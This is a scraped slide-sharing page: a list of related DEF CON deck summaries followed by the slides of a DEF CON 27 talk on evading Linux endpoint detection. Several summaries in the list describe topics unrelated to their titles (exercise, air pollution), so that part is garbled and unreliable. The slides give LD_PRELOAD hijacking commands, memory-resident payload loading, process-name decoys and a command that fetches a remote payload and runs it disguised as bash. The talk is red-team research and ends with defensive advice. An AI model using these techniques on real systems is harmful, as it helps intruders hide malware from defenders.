The document discusses vulnerabilities found in seismological network devices that could allow remote exploitation. It begins with a disclaimer and agenda. The speakers are then introduced as researchers from Costa Rica who were interested in these networks due to potential attack scenarios. Through a search engine, they discovered vulnerabilities in devices from multiple vendors. The talk demonstrates taking control of a device and outlines impacts such as sabotage. Recommendations are made to vendors to improve security of these critical scientific instruments.
DEF CON 24 - Tamas Szakaly - help i got antsFelipe Prado
The document discusses the benefits of exercise for mental health. Regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
DEF CON 24 - Ladar Levison - compelled decryptionFelipe Prado
This document appears to be a preview of slides for a presentation at DEF CON 24 about compelled decryption. The slides discuss the difference between first and third parties in communications and the Communications Assistance for Law Enforcement Act. It also lists several third parties like technology companies and individuals that could potentially be compelled to decrypt communications. The document indicates that it is a preliminary version and the slides may be altered before the actual presentation.
Deep learning systems are susceptible to adversarial manipulation through techniques like generating adversarial samples and substitute models. By making small, targeted perturbations to inputs, an attacker can cause misclassifications or reduce a model's confidence without affecting human perception of the inputs. This is possible due to blind spots in how models learn representations that are different from human concepts. Defending against such attacks requires training models with adversarial techniques to make them more robust.
DEF CON 24 - Chris Rock - how to overthrow a governmentFelipe Prado
This document outlines various strategies and tactics for overthrowing a government through covert and clandestine means, including cyber espionage, propaganda, agitation of public unrest, sabotage of critical infrastructure, and manipulation of financial systems. It discusses using mercenaries and private intelligence agencies to carry out these activities at an arm's length from sponsorship by nation states. Specific examples from Kuwait in 2011 are referenced to illustrate techniques for fomenting revolution through cyber and information operations.
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareFelipe Prado
This document discusses various ways that hardware can become "bricked", or rendered unusable, through both software and hardware issues. It covers 101 different bricking scenarios across firmware, printed circuit boards, connectors, integrated circuits, and unexpected situations. Examples include wiping firmware, damaging traces on PCBs, breaking solder joints on connectors, applying too much voltage to ICs, and devices being bricked by environmental factors. The document provides tips for both bricking and avoiding bricking hardware, as well as techniques for potentially unbricking devices.
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...Felipe Prado
This document provides an overview of a talk on novel USB attacks that can provide remote command and control of even air-gapped machines with minimal forensic footprint. It describes building an open-source toolset using freely available hardware that implements a stealthy bi-directional communication channel over USB using a keyboard/mouse and generic HID profiles to deploy payloads and proxy traffic without touching the network. The talk will demonstrate attacking Windows systems by staging payloads in memory to avoid disk artifacts and establishing a VNC session without user interaction or malware deployment. Source code and documentation for the toolset, called USaBUSe, will be released on GitHub at Defcon.
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationFelipe Prado
The document discusses common challenges and failures that can occur when conducting phishing campaigns professionally. It outlines eleven stories of phishing failures caused by issues like poor scheduling, spam filters blocking emails, not having enough target email addresses, domain name choices being too obvious, and lack of communication. For each failure, it provides recommendations on how to avoid the problem by improving collaboration, communication, planning and negotiation with the client organization. The overall message is that success requires treating phishing engagements as multi-party negotiations and managing expectations through clear communication and involvement of all stakeholders.
The document discusses vulnerabilities found in human-machine interface (HMI) solutions used for industrial control systems. It details a case study of multiple stack-based buffer overflow vulnerabilities found in Advantech WebAccess through an RPC service that could allow remote code execution. The vulnerabilities were caused by improper validation of user-supplied input to functions like sprintf and strcpy. While patches were released, analysis showed the fixes did not fully address the underlying problems with input handling.
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistFelipe Prado
This document summarizes tool-assisted speedruns (TAS) of video games. It discusses how emulators and tools are used to play games faster than humanly possible by deterministically recording every input. Advanced techniques like memory searching and scripting push games to their limits. Console verification devices were developed to play back TAS movies on original hardware. The document argues that TAS tools are like penetration testing tools and can be used to find and exploit vulnerabilities in games. It demonstrates an arbitrary code execution in Pokemon Red using an unintended opcode execution.
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksFelipe Prado
This document shows a graph with distance on the x-axis ranging from 0 to 35 meters and Received Signal Strength (RSS) in dBm on the y-axis ranging from -100 to -40 dBm. The graph contains a line for a model with a path loss exponent of 2.0 as well as scattered data points representing collected RSS measurements.
This document provides an overview of a hands-on, turbocharged pragmatic cloud security training that covers topics in a fraction of the normal time by slimming down four days of material into four hours. It will cover configuring production-quality AWS accounts, building deployment pipelines, and automating security controls. Most examples will use Ruby and Python. Nearly all labs will be in AWS. There will be minimal slides and hand-holding. Participants are responsible for their own AWS bills after the training.
DEF CON 24 - Grant Bugher - Bypassing captive portalsFelipe Prado
The document discusses the results of a study on the impact of COVID-19 lockdowns on air pollution. Researchers analyzed data from dozens of countries and found that lockdowns led to an average decline of nearly 30% in nitrogen dioxide levels over cities. However, they also observed that this improvement was temporary and air pollution rebounded once lockdowns were lifted as vehicle traffic increased again. The short-term reductions could help policymakers design better emission control strategies in the future.
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
Little Snitch is a host-based firewall for macOS that intercepts connection attempts and allows the user to approve or deny them. The document discusses understanding, bypassing, and reversing Little Snitch. It provides an overview of Little Snitch's components and architecture, describes several methods for bypassing its network filtering, and examines techniques for interacting with and disabling Little Snitch's kernel extension through the I/O Kit framework.
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...Felipe Prado
The document summarizes two presentations on cracking electronic safe locks. It discusses cracking a Sargent & Greenleaf 6120 safe lock by using a power analysis side-channel attack to recover the keycode stored in clear in the lock's EEPROM. It also discusses cracking a Sargent & Greenleaf Titan PivotBolt safe lock by using a timing side-channel attack to recover the keycode, and defeating the lock's incorrect code lockout feature.
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksFelipe Prado
This document discusses hacking heavy trucks and related networking protocols. It describes building a "Truck-in-a-Box" simulator to experiment with truck electronics and protocols like J1939 and J1708. The document outlines adventures in truck hacking, including modifying engine parameters, impersonating an engine control module, and exploiting bad cryptography. Details are provided on new hardware tools like the Truck Duck for analyzing truck communication networks.
DEF CON 24 - Dinesh and Shetty - practical android application exploitationFelipe Prado
The document provides an overview of a workshop on practical Android application exploitation. The workshop aims to teach skills for performing reverse engineering, static and dynamic testing, and binary analysis of Android applications. It will use demonstrations and hands-on exercises with custom applications like InsecureBankv2. The workshop focuses on discovery and remediation, targeting intermediate to advanced skill levels. It will cover tools, techniques, and common vulnerabilities to exploit Android applications.
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncFelipe Prado
The document discusses vulnerabilities in VNC implementations that allow unauthenticated access. It notes that a scan of the internet found over 335,000 VNC servers, with around 8,000 having no authentication. This lack of authentication allows attackers to access and "pivot" into internal networks. The document provides statistics on different VNC protocol versions found and describes exploits that could allow compromising devices to access additional internal systems through insecure VNC implementations and proxies.
DEF CON 24 - Antonio Joseph - fuzzing android devicesFelipe Prado
Droid-FF is an Android fuzzing framework that aims to automate the fuzzing process on Android devices. It uses Python scripts and integrates fuzzing tools like Peach and radamsa to generate test case data. The framework runs fuzzing campaigns on Android devices, processes the logs to identify crashes, verifies the crashes are unique, maps crashes to source code locations, and analyzes crashes for exploitability using a GDB plugin. The goal of Droid-FF is to make fuzzing easier on mobile devices and help find more crashes and potential vulnerabilities in Android applications and frameworks.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxSitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Tatiana Kojar
Skybuffer AI, built on the robust SAP Business Technology Platform (SAP BTP), is the latest and most advanced version of our AI development, reaffirming our commitment to delivering top-tier AI solutions. Skybuffer AI harnesses all the innovative capabilities of the SAP BTP in the AI domain, from Conversational AI to cutting-edge Generative AI and Retrieval-Augmented Generation (RAG). It also helps SAP customers safeguard their investments into SAP Conversational AI and ensure a seamless, one-click transition to SAP Business AI.
With Skybuffer AI, various AI models can be integrated into a single communication channel such as Microsoft Teams. This integration empowers business users with insights drawn from SAP backend systems, enterprise documents, and the expansive knowledge of Generative AI. And the best part of it is that it is all managed through our intuitive no-code Action Server interface, requiring no extensive coding knowledge and making the advanced AI accessible to more users.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Driving Business Innovation: Latest Generative AI Advancements & Success Story
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
1. Practical Tips for Playing Hide and Seek with Linux EDRs
DEFCON 27
@Op_Nomad
Zombie Ant Farm
! !
!!
2. $ who –m
Dimitry Snezhkov
• Technologist
• Member of the X-Force Red Team
ü hacking
ü tools, research
ü all things offensive
@Op_Nomad
github.com/dsnezhkov
3. Linux Offense: The Context
Linux matters
• It runs 90% of cloud workloads.
• Attacks bypass office networks and land directly in the backend.
• Attacks follows maximum ROI (access to data or computing resources).
• Linux Adversarial efforts may be focused and targeted.
• Defense follows the attacker.
Endpoint Detection and Response (EDR) solutions appear in Linux.
• Operators have to respond
4. Linux EDRs - A Case of a Mistaken Identity
• Pure play EDR products
• Heuristic engine in Antivirus
• Security Automation toolkits
• Deployment / Patch Management
• Side gig for app whitelisting solutions
• As features of DLP products
• Home grown monitoring frameworks
• Tool assisted Threat Hunting.
“Who in the world am I? Ah, that's the great puzzle.”
No, you are
not…
Have a good
day.
Blue
I am in yourLinux
box…
5. Operator has to address:
• Initial foothold mechanism viability. Immediate detection.
• Logging of activities, delayed interception and analysis.
• Behavioral runtime patterns that trigger heuristics.
• Persistent readiness for the long haul.
• Evade Automation
• Deflect tool assisted threat hunting
• Proactive Supervision Context
• Quiet boxes. Reliance on behavioral anomaly.
• Locked down boxes. Reliance on known policy enforcement.
• Peripheral sensors, honeypots.
Linux Offense: Strategic Sketches
6. Operational evasion:
• Operationally shut down EDRs.
• Directly exploit EDRs.
• Blind EDR reporting and response.
• Operationally confuse EDRs
Targeted behavior evasion:
• Target execution confusion.
• Bypass EDR detection with novel ways of target exploitation
• Deflect artifact discovery by Manual or Tool Assisted Threat hunting.
Strategic Goals and Objectives, Distilled
7. • Choice: Drop ready offensive tools on the target
Ø May be outright detected. The unknown unknown.
• Choice: Develop offensive tools on the target.
Ø May not have tooling, footprint of presence, noise increases.
• Choice: Utilization principle, aka “Living off the land”
Ø May not be possible in the proactive supervision context.
Strategic Goals and Objectives, Distilled
• Need a viable path to building Linux malware in the face of EDRs:
• Evade detection at target runtime.
• Hide and serve payloads in an unpredictable ways to counter “the story”.
8. Strategic Goals and Objectives, Distilled
Assembled Attack: A blended approach to break the consistent story.
Idea A: Bring in clean instrumented malware cradles.
Build iterative capabilities.
Idea B: Turn good binaries into instrumented malware cradles.
Use them as decoys.
9. Tactical Goals and Objectives, Sketches
Stage I: Build out Offensive Primitives
• Indiscriminate “preload and release” of legitimate binaries at runtime.
• Preload library chaining,
"split/scatter/assemble” of payload features.
• Delayed payload triggers and features at runtime.
• Rapid payload delivery mechanism prototypes with instrumented cradles.
10. Tactical Goals and Objectives, Sketches
Stage II: Weaponize and Operationalize Offensive Capabilities
• Payload brokers, “Preload-as-a-service”. Inter-process and remote
payload loading and hosting
• Process mimicry and decoys
• Library preloading in novel ways over memory.
12. Linker wires up dynamic locations
of needed libraries specified in the image.
Dynamic Link Loading: The Basics
ELF
13. $ ./executable
Error loading libctx.so
The Basics of Dynamic Link Loading
$ LD_DEBUG=libs LD_LIBRARY_PATH=./lib executable
107824: find library=libctx.so.1 [0]; searching
107824: Found file=./lib/libctx.so.1
“Hello World!”
$ ldd executable
libctx.so.1 => not found
$ readelf -d executable
0x0000000000000001 (NEEDED) Shared library: [libctx.so.1]
Execution Error: Dynamic dependency not found…
Where is the dependency?
Dependency is resolved!
14. Dynamic ELF Hooking: The Basics
Hook
Redefine and reroute KNOWN function entry points
15. Generic Dynamic API Hooking Tradeoffs
We are are implementing an API detour to execute foreign logic.
Challenges:
• Need to know the details of target API
FILE *fopen(const char *pathname, const char *mode);
• Invoke and avoid detection. Opsec. Known signatures for known exploits.
• Interoperate with the target binary in a clean fashion without crashing it.
• Assumption inspection tooling availability on target.
16. New ideas: Viability Check
Tip: Be more agnostic to the specifics of any single API in the binary.
Tip: Do not subvert the target. Instead:
• Compel it to execute malicious code
• Use it as a decoy.
• If you can start a process you
likely own the entire bootstrap of this process
• Preload the payload generically into a known target and
release for execution?
• Expand malware features by bringing other modules out of band.
17. • EDR sees the initial clean cradle, malware module loading is delayed.
• EDR sees the code executing by approved system binaries in the process table,
trusts the integrity of the known process.
• EDR may not fully trace inter-process data handoff
• preloaded malware calls on external data interchange
• memory resident executables and shared libraries
Parent / Child process relationships in Linux are transitive. We take advantage of this.
• If you can start the parent process, you fully own its execution resources,
and the resources of its progeny
Offensive Strategy: Desired Outcomes
23. 0x5 - Signals, Exceptions, Fault branching
Let’s keep breaking the EDR "story" of execution that leads to a confirmed IoC
ü Out of Band
signals.
ü Fault Branching
ü Self-triggered fault
recovery
ü Exception
Handlers
ü Timed execution
void fpe_handler(int signal, siginfo_t *w,
void *a)
{
printf("In SIGFPE handlern");
siglongjmp(fpe_env, w->si_code);
}
$LD_PRELOAD=lib/libinterrupt.so bin/ls
Trigger SIGFPE handler
In SIGFPE handler
1 / 0: caught division by zero!
Executing payloads here ...
24. • Rootkit style LD_PRELOAD cleanup (proc)
• Obfuscation (compile time)
• Runtime Encryption (memory)
• Runtime situational checks
• Better context mimicry
• Access to EDRs to prove the exact primitives
• No “main” no pain?
• Alternative loaders
0x6 - Back to Basics: Protecting Payloads
int _(void);
void __data_frame_e()
{
int x = _();
exit(x);
}
int _() {}
// Dynamic assignment to .interp section:
const char my_interp[] __attribute__((section(".interp"))) =
"/usr/local/bin/gelfload-ld-x86_64";
25. Expanding and Scaling the Evasion Capabilities
We now have some evasion primitives to work with. Nice.
Let’s expand the evasion.
Highlights:
• Target utilization.
• Hiding from EDRs via existing trusted binary decoys.
• Dynamic scripting capabilities in the field.
• Progressive LD_PRELOAD command line evasion.
• Malware preloaders with self-preservation instincts.
26. Utilization: Out of the Box Decoys
HOW MANY TIMES CAN YOUR PROCESS REGEX FAIL
• System binaries that run other binaries.
• Great decoys already exist on many Linux systems.
• ld.so is a loader that can run executables directly as parameters.
ld.so is always approved (known good)
• busybox meta binary is handy.
Combine the two to escape process pattern matching defensive engines?
Bounce off something trusted and available to break the path of analysis
28. Second Order Evasion Capabilities
Interface with a higher level code for greater evasion.
Rapid prototyping and development of modular malware.
• speed of development
• better upgrades
• memory safety
ü Offense to retool quickly on the target box.
ü "evade into reflection”.
Faced with dynamic code EDRs get lost in reflection tracing a call chain to a verified IoC.
ü Extend malware into preloading code from dynamic languages with decent FFI
29. 0x6A: Hiding Behind Reflective Mirrors
package main
import "C"
import (
"fmt"
)
var count int
//export Entry
func Entry(msg string) int {
fmt.Println(msg)
return count
}
func main() { // don’t care, or wild goose chase }
go build -o shim.so -buildmode=c-shared shim.go
DFIR: Reverse 2059 functions as a starting point ...
30. 0x6B: Escape to Dynamic Code: Interpreters
#include <lua.h>
#include <lauxlib.h>
#include <lualib.h>
int main(int argc, char** argv)
{
lua_State *L;
L = luaL_newstate();
luaL_openlibs(L);
/* Load the Lua script */
if (luaL_loadfile(L, argv[1]))
/* Run Lua script */
lua_pcall(L, 0, 0, 0)
lua_close(L);
}
$LD_LIBRARY_PATH=.
LD_PRELOAD=./liblua.so
./invoke_lua hello.lua
Main() is nothing more than a preloaded
constructor at this point
• EDRs lose trail if you
escape out to scripting
• start loading other libraries at runtime.
Pro-tip: Use it as another abstraction layer,
e.g. socket out or pipe to another process
hosting additional payloads
32. Stage II: Weaponizing and Operationalizing Payloads
ü Uber preloaders
ü Inline Parameterized Command Evasion.
ü Memory-resident Malware Modules.
ü Modular Malware Payload Warehouses
ü Remote module loads
ü Utilizable loaders
35. Uber Preloaders
// resolve Entry symbol
int (*entry)(char *) = dlsym(handle, "Entry");
//pass arguments along if any
if ( (modload_args_t = (char*) getenv("LD_MODULE_ARGS")) != NULL ){
modload_args = strdup(modload_args_t);
modload_args_len = strlen(modload_args);
}
Chains may still
• dlopen() a module or use weak references
• Adhere to API contracts
• Implement Process mimicry and decoys
• Switch on IPC communication and data signaling
• Clean out artifacts (a la rootkit)
// Call FFI stack
36. Memory-resident malware modules
One small problem: those modules are files.
• On disk.
• Scannable and inspectable by EDRs.
• And admins.
Sometimes it’s OK (EDR identity crisis). We still want flexibility.
The way to fix that is to
load modules in memory. OS is happy
execute them from memory. OS is not happy. Let’s make it happy.
37. Memory-resident malware modules
Several ways to operate files in shared memory in Linux:
• tmpfs filesystem (via /dev/shm), if mounted; have to be root to mount
others.
• POSIX shared memory, memory mmap()'d files.
o Some, you cannot obtain execution of code from.
o Others, do not provide you fully memory based abstraction, leaving a file
path visible for inspection.
Kernel 3.17 Linux gained a system call memfd_create(2) (sys_356/319)
39. Uber preloader PID 56417, Meet your Volatile Memory
LD_PCMD="r:smtp" LD_MODULE="./lib/shim.so" LD_MODULE_ARGS="hello"
LD_PRELOAD=./lib/libctx.so.1 /bin/ls
LD_PCMD="r:smtp" LD_MODULE=“/proc/56417/fd/3" LD_MODULE_ARGS="hello"
LD_PRELOAD=./lib/libctx.so.1 /bin/ls
56417
!
"
What we have
What we want
42. ZAF Module Loader and Payload Driver
• Fetches remote payloads and stores them in
memory.
• Runs an in-memory list of available modules,
opens payloads to all local preloaders.
• Has OS evasion and self-preservation instincts.
• Can mimic a specified process name.
• At the request of an operator
de-stages malware modules.
43. LD_MODULE="/proc/56417/fd/3"
LD_PRELOAD=./libctx.so.1 /bin/ls
• Take payload from ZAF process memory space
• Reference payload via Uber-Preloader,
• Preload payload (or chain) into the target
ZAF + Preloader Synergy
56417
1st order shim
2nd order shim
56417 - ZAF Memory space holding payloads
44. ZAF Broker Operational Summary
1
3
2
Preloaded shims or
subverted system exec
Uber Preloader pipeline
ZAF Payload Broker Service
46. PyPreload: Cradle + (Decoy / Mimicry) + Memory
$ pypreload.py -t so -l
http://127.0.0.1:8080/libpayload.so -d bash -c /bin/ls
Note: bash here is the decoy for the process name we use for the process
table, we do not use any bash functionality. “Bash” just looks good for
Threat hunters.
56417 pts/6 S+ 0:00 | | | _ bash
56418 pts/6 S+ 0:00 | | | _ /bin/ls
bash . ls
49. 1. ASLR at-start weakening
• Weaken targets via predictable memory addresses
• Load to static address or an artificial code cave.
Linux execution domains <sys/personality.h>
ADDR_NO_RANDOMIZE (since Linux 2.6.12)
Parent -> set personality -> Fork() -> UNRANDOMIZED process
2. Cross Memory Attach
• Artificial Code Caves
• IPC evasion (User to User space vs. User to Kernel to User space)
process_vm_readv(), process_vm_writev()
Additional Tips and Research Roadmap
52. Offensive Summary
ü Preloading is a viable path to evasion via system executables.
ü Bring clean cradles to build on, or use executables on the target as decoys.
ü Use assembled attack. Split/Scatter/Assemble techniques vs. EDRs.
ü Out-of-process payload delivery is sometimes what you need.
“Preloader-as-a-Service” over memory is possible.
ü C FFI is the common denominator for interop on Linux, and can be used
for evasion.
ü Don’t kill a fly with a sword (even though you know you want to).
But do turn chopsticks into swords when needed.
ü Protect your payloads and payload delivery mechanisms.
https://github.com/dsnezhkov/zombieantCode:
53. What can the Defense do?
• Start implementing Linux capabilities.
• Define clearly what EDRs will and can do for you.
• Use provided ideas for manual threat hunting.
• Optics into /proc.
• Optics into dynamic loading, memfd().
• Optics into IPC
• Optics into process library load
• Start thinking more about proactive contextual supervision.